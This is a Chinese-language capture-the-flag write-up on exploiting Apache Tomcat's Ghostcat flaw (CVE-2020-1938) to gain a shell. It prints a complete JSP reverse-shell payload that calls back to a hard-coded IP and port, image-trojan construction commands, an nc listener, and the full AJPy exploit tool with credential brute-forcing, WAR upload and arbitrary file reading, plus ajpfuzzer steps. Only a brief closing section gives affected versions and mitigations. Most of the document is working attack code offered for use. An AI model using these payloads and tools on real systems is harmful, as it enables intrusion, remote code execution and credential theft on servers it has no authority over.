
  <%@page import="java.lang.*"%>
  <%@page import="java.util.*"%>
  <%@page import="java.io.*"%>
  <%@page import="java.net.*"%>
  
  <%
    class StreamConnector extends Thread
    {
      InputStream sG;
      OutputStream p2;
  
      StreamConnector( InputStream sG, OutputStream p2 )
      {
        this.sG = sG;
        this.p2 = p2;
      }
  
      public void run()
      {
        BufferedReader rB  = null;
        BufferedWriter xij = null;
        try
        {
          rB  = new BufferedReader( new InputStreamReader( this.sG ) );
          xij = new BufferedWriter( new OutputStreamWriter( this.p2 ) );
          char buffer[] = new char[8192];
          int length;
          while( ( length = rB.read( buffer, 0, buffer.length ) ) > 0 )
          {
            xij.write( buffer, 0, length );
            xij.flush();
          }
        } catch( Exception e ){}
        try
        {
          if( rB != null )
            rB.close();
          if( xij != null )
            xij.close();
        } catch( Exception e ){}
      }
    }
  
    try
    {
      String ShellPath;
  if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1) {
    ShellPath = new String("/bin/sh");
  } else {
    ShellPath = new String("cmd.exe");
  }
  
      Socket socket = new Socket( "192.168.255.130", 4444 );
      Process process = Runtime.getRuntime().exec( ShellPath );
      ( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
      ( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
    } catch( Exception e ) {}
  %>

• 构造图片马后上传

  # Windows平台："合并.bat"
  copy img.jpg/b + shell.jsp/a shell.jpg
  
  # 传入的图片马
  http://106.15.50.112:18080/whalwl/upload/2022-000047-000027.jpg
  
  flag{a3f961e96e9706f21cf44a8b91822f94}

• 文件包含

  # 远程服务器监听端口，此处使用nc
  nc -lvvnp 4444
  
  # 基于前面修改的代码继续修改
  # CNVD-2020-10487-Tomcat-Ajp-lfi.py 的 296行：
  # _,data = t.perform_request('/whalwl/asdf',attributes=[
  # 修改为
  # _,data = t.perform_request('/whalwl/asdf.jsp',attributes=[
  
  # 利用脚本实现文件包含以读取文件
  python2 CNVD-2020-10487-Tomcat-Ajp-lfi.py 106.15.50.112 -p 18009 -f upload/2022-000047-000027.jpg

0b101 getshell(二)

• 使用脚本：https://github.com/hypn0s/AJPy

  # 更简单，不用总修改代码
  
  # 读 /WEB-INF/web.xml
  python3 tomcat.py --port 18009 read_file --webapp=whalwl /WEB-INF/web.xml 106.15.50.112
  
  # 读图片马，反弹shell
  python3 tomcat.py --port 18009 read_file --webapp=whalwl /upload/2022-000047-000027.jpg 106.15.50.11

#!/usr/bin/env python
#
# Julien Legras - Synacktiv
#
# THIS SOFTWARE IS PROVIDED BY SYNACKTIV ''AS IS'' AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL SYNACKTIV BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.

from ajpy.ajp import AjpResponse, AjpForwardRequest, AjpBodyRequest, NotFoundException
from pprint import pprint, pformat

from base64 import b64encode
import socket
import argparse
import logging
import re
import os
import logging
import sys
try:
	from urllib import unquote
except ImportError:
	from urllib.parse import unquote

def setup_logger():
	logger = logging.getLogger('meow')
	handler = logging.StreamHandler()
	logger.addHandler(handler)
	logger.setLevel(logging.DEBUG)

	return logger

logger = setup_logger()


# helpers
def prepare_ajp_forward_request(target_host, req_uri, method=AjpForwardRequest.GET):
	fr = AjpForwardRequest(AjpForwardRequest.SERVER_TO_CONTAINER)
	fr.method = method
	fr.protocol = "HTTP/1.1"
	fr.req_uri = req_uri
	fr.remote_addr = target_host
	fr.remote_host = None
	fr.server_name = target_host
	fr.server_port = 80
	fr.request_headers = {
		'SC_REQ_ACCEPT': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
		'SC_REQ_CONNECTION': 'keep-alive',
		'SC_REQ_CONTENT_LENGTH': '0',
		'SC_REQ_HOST': target_host,
		'SC_REQ_USER_AGENT': 'Mozilla/5.0 (X11; Linux x86_64; rv:46.0) Gecko/20100101 Firefox/46.0',
		'Accept-Encoding': 'gzip, deflate, sdch',
		'Accept-Language': 'en-US,en;q=0.5',
		'Upgrade-Insecure-Requests': '1',
		'Cache-Control': 'max-age=0'
	}
	fr.is_ssl = False

	fr.attributes = []

	return fr


class Tomcat(object):
	def __init__(self, target_host, target_port):
		self.target_host = target_host
		self.target_port = target_port

		self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
		self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
		self.socket.connect((target_host, target_port))
		self.stream = self.socket.makefile("rb")


	def test_password(self, user, password):
		res = False
		stop = False
		creds = b64encode(("%s:%s" % (user, password)).encode('utf-8')).decode('utf-8')
		self.forward_request.request_headers['SC_REQ_AUTHORIZATION'] = "Basic " + creds
		while not stop:
			logger.debug("testing %s:%s" % (user, password))
			responses = self.forward_request.send_and_receive(self.socket, self.stream)
			snd_hdrs_res = responses[0]
			if snd_hdrs_res.http_status_code == 404:
				raise NotFoundException("The req_uri %s does not exist!" % self.req_uri)
			elif snd_hdrs_res.http_status_code == 302:
				self.req_uri = snd_hdrs_res.response_headers.get('Location', '')
				logger.info("Redirecting to %s" % self.req_uri)
				self.forward_request.req_uri = self.req_uri
			elif snd_hdrs_res.http_status_code == 200:
				logger.info("Found valid credz: %s:%s" % (user, password))
				res = True
				stop = True
				if 'Set-Cookie' in snd_hdrs_res.response_headers:
					logger.info("Here is your cookie: %s" % (snd_hdrs_res.response_headers.get('Set-Cookie', '')))
			elif snd_hdrs_res.http_status_code == 403:
				logger.info("Found valid credz: %s:%s but the user is not authorized to access this resource" % (user, password))
				stop = True
			elif snd_hdrs_res.http_status_code == 401:
				stop = True

		return res

	def start_bruteforce(self, users, passwords, req_uri, autostop):
		logger.info("Attacking a tomcat at ajp13://%s:%d%s" % (self.target_host, self.target_port, req_uri))
		self.req_uri = req_uri
		self.forward_request = prepare_ajp_forward_request(self.target_host, self.req_uri)
 	 
		f_users = open(users, "r")
		f_passwords = open(passwords, "r")

		valid_credz = []
		try:
			for user in f_users:
				f_passwords.seek(0, 0)
				for password in f_passwords:
					if autostop and len(valid_credz) > 0:
						self.socket.close()
						return valid_credz

					user = user.rstrip('\n')
					password = password.rstrip('\n')
					if self.test_password(user, password):
						valid_credz.append((user, password))
		except NotFoundException as e:
			logger.fatal(e.message)
		finally:
			logger.debug("Closing socket...")
			self.socket.close()
			return valid_credz


	def perform_request(self, req_uri, headers={}, method='GET', user=None, password=None, attributes=[]):
		self.req_uri = req_uri
		self.forward_request = prepare_ajp_forward_request(self.target_host, self.req_uri, method=AjpForwardRequest.REQUEST_METHODS.get(method))
		logger.debug("Getting resource at ajp13://%s:%d%s" % (self.target_host, self.target_port, req_uri))
		if user is not None and password is not None:
			creds = b64encode(("%s:%s" % (user, password)).encode('utf-8')).decode('utf-8')
			self.forward_request.request_headers['SC_REQ_AUTHORIZATION'] = "Basic " + creds

		for h in headers:
			self.forward_request.request_headers[h] = headers[h]

		for a in attributes:
			self.forward_request.attributes.append(a)

		responses = self.forward_request.send_and_receive(self.socket, self.stream)
		if len(responses) == 0:
			return None, None

		snd_hdrs_res = responses[0]

		data_res = responses[1:-1]
		if len(data_res) == 0:
			logger.info("No data in response. Headers:\n %s" % pformat(vars(snd_hdrs_res)))

		return snd_hdrs_res, data_res

	def upload(self, filename, user, password, old_version, headers={}):
		deploy_csrf_token, obj_cookie = self.get_csrf_token(user, password, old_version, headers)
		with open(filename, "rb") as f_input:
			with open("/tmp/request", "w+b") as f:
				s_form_header = '------WebKitFormBoundaryb2qpuwMoVtQJENti\r\nContent-Disposition: form-data; name="deployWar"; filename="%s"\r\nContent-Type: application/octet-stream\r\n\r\n' % os.path.basename(filename)
				s_form_footer = '\r\n------WebKitFormBoundaryb2qpuwMoVtQJENti--\r\n'
				f.write(s_form_header.encode('utf-8'))
				f.write(f_input.read())
				f.write(s_form_footer.encode('utf-8'))

		data_len = os.path.getsize("/tmp/request")

		headers = {
				"SC_REQ_CONTENT_TYPE": "multipart/form-data; boundary=----WebKitFormBoundaryb2qpuwMoVtQJENti",
				"SC_REQ_CONTENT_LENGTH": "%d" % data_len,
				"SC_REQ_REFERER": "http://%s/manager/html/" % (self.target_host),
				"Origin": "http://%s" % (self.target_host),
		}
		if obj_cookie is not None:
			headers["SC_REQ_COOKIE"] = obj_cookie.group('cookie')

		attributes = [{"name": "req_attribute", "value": ("JK_LB_ACTIVATION", "ACT")}, {"name": "req_attribute", "value": ("AJP_REMOTE_PORT", "12345")}]
		if old_version == False:
			attributes.append({"name": "query_string", "value": deploy_csrf_token})
		old_apps = self.list_installed_applications(user, password, old_version)
		r = self.perform_request("/manager/html/upload", headers=headers, method="POST", user=user, password=password, attributes=attributes)

		with open("/tmp/request", "rb") as f:
			br = AjpBodyRequest(f, data_len, AjpBodyRequest.SERVER_TO_CONTAINER)
			br.send_and_receive(self.socket, self.stream)

		r = AjpResponse.receive(self.stream)
		if r.prefix_code == AjpResponse.END_RESPONSE:
			logger.error('Upload failed')

		while r.prefix_code != AjpResponse.END_RESPONSE:
			r = AjpResponse.receive(self.stream)
		logger.debug('Upload seems normal. Checking...')
		new_apps = self.list_installed_applications(user, password, old_version)
		if len(new_apps) == len(old_apps) + 1:
			logger.info('Upload success!')
		else:
			logger.error('Upload failed')

	def get_error_page(self):
		return self.perform_request("/blablablablabla")

	def get_version(self):
		hdrs, data = self.get_error_page()
		for d in data:
			s = re.findall('(Apache Tomcat/[0-9\.]+)', d.data.decode('utf-8'))
			if len(s) > 0:
				return s[0]

	def get_csrf_token(self, user, password, old_version, headers={}, query=[]):
		# first we request the manager page to get the CSRF token
		hdrs, rdata = self.perform_request("/manager/html", headers=headers, user=user, password=password)
		deploy_csrf_token = re.findall('(org.apache.catalina.filters.CSRF_NONCE=[0-9A-F]*)"', "".join([d.data.decode('utf8') for d in rdata]))
		if old_version == False:
			if len(deploy_csrf_token) == 0:
				logger.critical("Failed to get CSRF token. Check the credentials")
				return

			logger.debug('CSRF token = %s' % deploy_csrf_token[0])
		obj = re.match("(?P<cookie>JSESSIONID=[0-9A-F]*); Path=/manager(/)?; HttpOnly", hdrs.response_headers.get('Set-Cookie', '').decode('utf-8'))
		if obj is not None:
			return deploy_csrf_token[0], obj
		return deploy_csrf_token[0], None


	def list_installed_applications(self, user, password, old_version, headers={}):
		deploy_csrf_token, obj_cookie = self.get_csrf_token(user, password, old_version, headers)
		headers = {
				"SC_REQ_CONTENT_TYPE": "application/x-www-form-urlencoded",
				"SC_REQ_CONTENT_LENGTH": "0",
				"SC_REQ_REFERER": "http://%s/manager/html/" % (self.target_host),
				"Origin": "http://%s" % (self.target_host),
		}
		if obj_cookie is not None:
			headers["SC_REQ_COOKIE"] = obj_cookie.group('cookie')

		attributes = [{"name": "req_attribute", "value": ("JK_LB_ACTIVATION", "ACT")},
			{"name": "req_attribute", "value": ("AJP_REMOTE_PORT", "{}".format(self.socket.getsockname()[1]))}]
		if old_version == False:
			attributes.append({
			"name": "query_string", "value": "%s" % deploy_csrf_token})
		hdrs, data = self.perform_request("/manager/html/", headers=headers, method="GET", user=user, password=password, attributes=attributes)
		found = []
		for d in data:
			im = re.findall('<small><a href="([^";]*)">', d.data.decode('utf8'))
			for app in im:
				found.append(unquote(app))
		return found


	def undeploy(self, path, user, password, old_version, headers={}):
		deploy_csrf_token, obj_cookie = self.get_csrf_token(user, password, old_version, headers)
		path_app = "path=%s" % path
		headers = {
				"SC_REQ_CONTENT_TYPE": "application/x-www-form-urlencoded",
				"SC_REQ_CONTENT_LENGTH": "0",
				"SC_REQ_REFERER": "http://%s/manager/html/" % (self.target_host),
				"Origin": "http://%s" % (self.target_host),
		}
		if obj_cookie is not None:
			headers["SC_REQ_COOKIE"] = obj_cookie.group('cookie')

		attributes = [{"name": "req_attribute", "value": ("JK_LB_ACTIVATION", "ACT")},
			{"name": "req_attribute", "value": ("AJP_REMOTE_PORT", "{}".format(self.socket.getsockname()[1]))}]
		if old_version == False:
			attributes.append({
			"name": "query_string", "value": "%s&%s" % (path_app, deploy_csrf_token)})
		r = self.perform_request("/manager/html/undeploy", headers=headers, method="POST", user=user, password=password, attributes=attributes)
		r = AjpResponse.receive(self.stream)
		if r.prefix_code == AjpResponse.END_RESPONSE:
			logger.error('Undeploy failed')

		# Check the successful message
		found = False
		regex = r'<small><strong>Message:<\/strong><\/small>&nbsp;<\/td>\s*<td class="row-left"><pre>(OK - .*'+path+')\s*<\/pre><\/td>'
		while r.prefix_code != AjpResponse.END_RESPONSE:
			r = AjpResponse.receive(self.stream)
			if r.prefix_code == 3:
				f = re.findall(regex, r.data.decode('utf-8'))
				if len(f) > 0:
					found = True
		if found:
			logger.info('Undeploy succeed')
		else:
			logger.error('Undeploy failed')


if __name__ == "__main__":
	parser = argparse.ArgumentParser()
	subparsers = parser.add_subparsers()

	parser.add_argument("target", type=str, help="Hostname or IP to attack")
	parser.add_argument("--port", type=int, default=8009, help="AJP port to attack (default is 8009)")
	parser.add_argument('-v', '--verbose', action='count', default=1)

	parser_bf = subparsers.add_parser('bf', help='Bruteforce Basic authentication')
	parser_bf.set_defaults(which='bf')
	parser_bf.add_argument("req_uri", type=str, default="/manager/html", help="Resource to attack")
	parser_bf.add_argument("-U", "--users", type=str, help="Filename containing the usernames to test against the Tomcat manager AJP", required=True)
	parser_bf.add_argument("-P", "--passwords", type=str, help="Filename containing the passwords to test against the Tomcat manager AJP", required=True)
	parser_bf.add_argument('-s', '--stop', action='store_true', default=False, help="Stop when we find valid credz")

#	parser_req = subparsers.add_parser('req', help='Request resource')
#	parser_req.set_defaults(which='req')
#	parser_req.add_argument("-m", "--method", type=str, default="GET", help="Request method (default=GET)", choices=AjpForwardRequest.REQUEST_METHODS.keys())

	parser_upload = subparsers.add_parser('upload', help='Upload WAR')
	parser_upload.set_defaults(which='upload')
	parser_upload.add_argument("filename", type=str, help="WAR file to upload")
	parser_upload.add_argument("-u", "--user", type=str, default=None, help="Username")
	parser_upload.add_argument("-p", "--password", type=str, default=None, help="Password")
	parser_upload.add_argument("-H", "--headers", type=str, default={}, help="Custom headers")
	parser_upload.add_argument("--old-version", action='store_true', default=False, help="Old version of Tomcat that does not implement anti-CSRF token")

	parser_upload = subparsers.add_parser('undeploy', help='Undeploy WAR')
	parser_upload.set_defaults(which='undeploy')
	parser_upload.add_argument("path", type=str, help="Installed WAR path")
	parser_upload.add_argument("-u", "--user", type=str, default=None, help="Username")
	parser_upload.add_argument("-p", "--password", type=str, default=None, help="Password")
	parser_upload.add_argument("-H", "--headers", type=str, default={}, help="Custom headers")
	parser_upload.add_argument("--old-version", action='store_true', default=False, help="Old version of Tomcat that does not implement anti-CSRF token")

	parser_version = subparsers.add_parser('version', help='Get version')
	parser_version.set_defaults(which='version')
	parser_upload = subparsers.add_parser('list', help='List installed applications')
	parser_upload.set_defaults(which='list')
	parser_upload.add_argument("-u", "--user", type=str, default=None, help="Username")
	parser_upload.add_argument("-p", "--password", type=str, default=None, help="Password")
	parser_upload.add_argument("-H", "--headers", type=str, default={}, help="Custom headers")
	parser_upload.add_argument("--old-version", action='store_true', default=False, help="Old version of Tomcat that does not implement anti-CSRF token")

	read_file = subparsers.add_parser('read_file', help='Exploit CVE-2020-1938')
	read_file.set_defaults(which='read_file')
	read_file.add_argument("file_path", type=str, help="File to read")
	read_file.add_argument("-w", "--webapp", type=str, default="", help="webapp potential params: 'manager', 'host-manager', 'ROOT' or 'examples'")
	read_file.add_argument("-o", "--output", type=str, help="Output file (for binary files)")

	args = parser.parse_args()


	if args.verbose == 1:
		logger.setLevel(logging.INFO)
	else:
		logger.setLevel(logging.DEBUG)

	bf = Tomcat(args.target, args.port)
	if args.which == 'bf':
		bf.start_bruteforce(args.users, args.passwords, args.req_uri, args.stop)
#	elif args.which == 'req':
#		print bf.perform_request(args.req_uri, args.headers, args.method, args.user, args.password)
	elif args.which == 'upload':
		bf.upload(args.filename, args.user, args.password, args.old_version, args.headers)
	elif args.which == 'version':
		print(bf.get_version())
	elif args.which == 'list':
		apps = bf.list_installed_applications(args.user, args.password, args.old_version, args.headers)
		logger.info("Installed applications:")
		for app in apps:
			logger.info('- ' + app)
	elif args.which == 'undeploy':
		bf.undeploy(args.path, args.user, args.password, args.old_version, args.headers)
	elif args.which == 'read_file':
		attributes = [
			{"name": "req_attribute", "value": ("javax.servlet.include.request_uri", "/",)},
			{"name": "req_attribute", "value": ("javax.servlet.include.path_info", args.file_path,)},
			{"name": "req_attribute", "value": ("javax.servlet.include.servlet_path", "/",)},
		]
		hdrs, data = bf.perform_request("/" + args.webapp + "/xxxxx.jsp", attributes=attributes)
		output = sys.stdout
		if args.output:
			output = open(args.output, "wb")
		for d in data:
			if args.output:
				output.write(d.data)
			else:
				try:
				    output.write(d.data.decode('utf8'))
				except UnicodeDecodeError:
				    output.write(repr(d.data))

		if args.output:
			output.close()

0b110 getshell(三)

• 下载 AJP 包构造器 ajpfuzzer ：wget https://github.com/doyensec/ajpfuzzer/releases/download/v0.6/ajpfuzzer_v0.6.jar
• 运行 ajpfuzzer：java -jar ajpfuzzer_v0.6.jar
• 连接目标靶机端口：connect 106.15.50.112 18009
• 执行如下命令构造并发送AJP包，其中/upload/2022-000047-000027.jpg为木马路径，其中/whalwl/11.jsp可以换为该web项目下任意目录中没有的jsp文件，如此tomcat才会去调用DefaultServlet

  forwardrequest 2 "HTTP/1.1" "/whalwl/11.jsp" 127.0.0.1 127.0.0.1 porto 8009 false "Cookie:AAAA=BBBB","Accept-Encoding:identity" "javax.servlet.include.request_uri:11.jsp","javax.servlet.include.path_info:/upload/2022-000047-000027.jpg","javax.servlet.include.servlet_path:/"

0b111参考文档

• 参考1：https://www.jianshu.com/p/440bc2662fc3
• 参考4：https://mp.weixin.qq.com/s?__biz=MzUyNDk0MDQ3OQ==&mid=2247485009&idx=1&sn=5f619c27ec994949f5fa69d41d2dee05&chksm=fa24e381cd536a972db2cc5a5fc09be33a7833f1caa6440bb5979d3d7ea052384645fbd2b62c&mpshare=1&scene=23&srcid=&sharer_sharetime=1584439554350&sharer_shareid=1f92b9e8670fffeb7eea157894e3536a#rd
• 参考6：https://zhzhdoai.github.io/2020/02/26/Tomcat-Ajp%E5%8D%8F%E8%AE%AE%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E5%88%A9%E7%94%A8-CVE-2020-1938/
• 参考8：https://blog.csdn.net/Kris__zhang/article/details/106232024

0o02 CVE-2020-1938

• 漏洞概述：2020年2月20日，国家信息安全漏洞共享平台（CNVD）发布关于Apache Tomcat的安全公告，Apache Tomcat文件包含漏洞（CNVD-2020-10487，对应CVE-2020-1938）。Tomcat AJP协议由于存在实现缺陷导致相关参数可控，攻击者利用该漏洞可通过构造特定参数，读取服务器 webapp 下的任意文件，如 WEB-INF/web.xml。若服务器端同时存在文件上传功能，攻击者可进一步实现远程代码的执行。
• 影响版本：Tomcat 6.x，7.x < 7.0.100，8.x <8.5.51，9.x < 9.0.31。
• 漏洞防护：① 更新至最新版本；② 禁用 AJP 协议，注释或删除 /conf/server.xml 的 <Connectorport="8009" protocol="AJP/1.3"redirectPort="8443" /> ；③ 配置 secret 以设置 AJP 协议的认证凭证，如 <Connector port="8009"protocol="AJP/1.3" redirectPort="8443"address="YOUR_TOMCAT_IP_ADDRESS" secret="YOUR_TOMCAT_AJP_SECRET"/>。注：YOUR_TOMCAT_AJP_SECRET 需设置更难猜解。
• 漏洞解析：https://weread.qq.com/web/reader/c8732a70726fa058c87154bk76d325c028076dc611d6d8c
• 参考文章：https://www.chaitin.cn/zh/ghostcat